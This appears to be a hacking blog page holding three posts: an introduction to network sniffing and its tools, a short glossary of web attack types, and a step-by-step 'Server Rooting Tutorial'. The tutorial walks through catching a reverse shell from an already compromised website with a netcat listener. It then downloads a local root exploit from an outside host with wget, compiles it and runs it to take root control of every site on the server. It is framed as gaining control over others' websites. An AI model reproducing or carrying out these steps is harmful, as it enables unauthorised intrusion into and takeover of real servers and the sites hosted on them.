Network Sniffing- An Introduction

Do you think that you are safe by using some smart antivirus tools to protect your computer from backdoors like remote administrator tools or from keyloggers, it is good to use smart antivirus and firewall but you must consider sniffing as a security issue. There are so many tools available for various operating system includes windows and Linux, we will talk about the tools later on but firstly there is a need to describe sniffing.  

Network sniffing tools and packet analyser tools are generally the same thing, the main purpose of sniffing is to analyse the incoming and outgoing packets, keep in mind when you connect to a web server or to any network (computer) you sends your data via wired connection or wireless connection in the form of packets, your data goes in the form of packets.


A packet contain the source (Sender) and the destination (Receiver) IP and MAC address and also it contains the data that are going to be sent. So just imagine if someone get this packet than he/she can easily know what you have send, an attacker can easily sniff your confidential information (credit card, paypal, passwords etc), so the sniffing is the important attack that should be consider as a security measure.



Large organisation and web server uses secure connection for transmission for example paypal uses https:// instead of http:// so its means your data goes in the form of encrypt data. If you are using SSL it does not mean that you are secure ever there is way to crack the secure channel


All the thing that discussed above shows that sniffing is not a good thing, however it is not true the Positive usage of sniffer is also its regular usage, which aim is to maintain network and system working normally.

• Capturing packets
• Recording and analysing traffic
• Decrypting packets and displaying in clear text
• Converting data to readable format
• Showing relevant information like IP, protocol, host or server name and so on.

While the negative usage is open and clear:

• Catching password, which is the main reason for most illegal uses of sniffing tool
• Capturing special and private information of transactions, like username, credit ID, account, and password
• Recording email or instant message and resuming its content
  

The famous and the most widely used tools for sniffing purposes are:

• Wireshark (We will discuss it on later)
• Kismet   (For wireless sniffing, discussed)
• Netstumber (For wireless sniffing, discussed)
• Kismac (For Wireless sniffing, discussed)
• Ettercap (We will discuss it on later)
• Tcpdump ( We will discuss it on later)
• Cain and Abel ( We will discuss it on later)
• Etc

Read more »

Types Of Hacking

SQLi - SQL Injection, allows to spoof queries and get important data out of the database such as logins etc.
BSQLi - Blind SQL Injection, harder than the normal one and requires much more time.
XSS - Cross site scripting. Allows you to run CSS scripts on websites. Can be useful to steal cookies.
LFI - Local File Inclusion, allows to include a local page. Can be exploited and shell uploaded. Sometimes filtered, but you can bypass it using Null byte Injection .
RFI - Remote File Inclusion, allows you to include a page from a remote host. Usually parses the code into the .php file and executes it.
SSI - Server side includes, like code execution. Affected extensions: .shtm, .shtml and more.
RCE - Remote command/code execution, allows to execute code on the remote host.

Read more »

Server Rooting Tutorial

I will show you how to exploit a Linux server and gain root access. This will benefit you in many ways, for example having control of all websites hosted on the server. Enough talking, let's begin!

Requirements for this tutorial:

- A shelled website.
- NetCat installed on your computer.
- Patience
- Port 443 or any other except 80 opened on your router.

Okay, first let's navigate to our shell. If the shell is GNY, you will see something like 'Back Connect'. Go there. Now you see 3 textboxes. Bind to bin/shor backconnect. Type in your IP and the port you want the server to connect (it must be opened on your router.). Now do not press backconnect yet. Download NetCat here:

www.downloadnetcat.com

Extract the files to your desktop in a folder. Now go to Run>cmd. Open cmd. Now type:

cd

Replace with the path of netcat. Okay, now type:

nc -lnvp

Replace with the port you opened and used on the shell.

Now it should display something like this:

Listening on port [any] ...

Minimze this window, and go on the web shell. Type in your IP address and port, click backconnect. If you did all right, and the server does not have a firewall and if your ports are forwarded correctly, you should see an incoming connection from the server. You have a shell! Now you can type 'id' to see your current ID. Let's say your ID is 23. You have control over your website only. But not for long. Now type 'uname -a'. You will get the full kernel version. Simply copy it and google for local root exploits. Let's say it is 2.6.18 2008 version... Hmm that is pretty outdated! Well, let's exploit it. Cd to the tmp directory, that is always writeable.

Type this:

cd /tmp

Now let's make a folder for the exploit.

mkdir exploit

cd into this folder.

cd exploit

Now comes the tricky part. We will use h00lyshit exploit for this kernel. Type:

wget http://goodbye.fileave.com/localroot.c

Now type 'ls'. You should see localroot.c in this folder. We need to compile it. Type:

gcc localroot.c -o h00lyshit

Now type 'ls' and you should see 2 files, localroot.c and h00lyshit. h00lyshit requires a large file on the server in order to get root access, so let's create one. Type this and hit enter:

dd if=/dev/urandom of=largefile count=2M

This will create a large file, where largefile is the name of it. This can take up to 5 minutes. Once ready, chmod hoolyshit and largefile to 777, so:

chmod 777 h00lyshit
chmod 777 largefile

Now let's run the exploit! Type this:

./h00lyshit largefile

Now wait, wait for about 3 minutes. If the kernel is not patched and if it is the right version, you are root! Type 'id' and you will see:

uid=0(root)

You have successfully gained root!

Read more »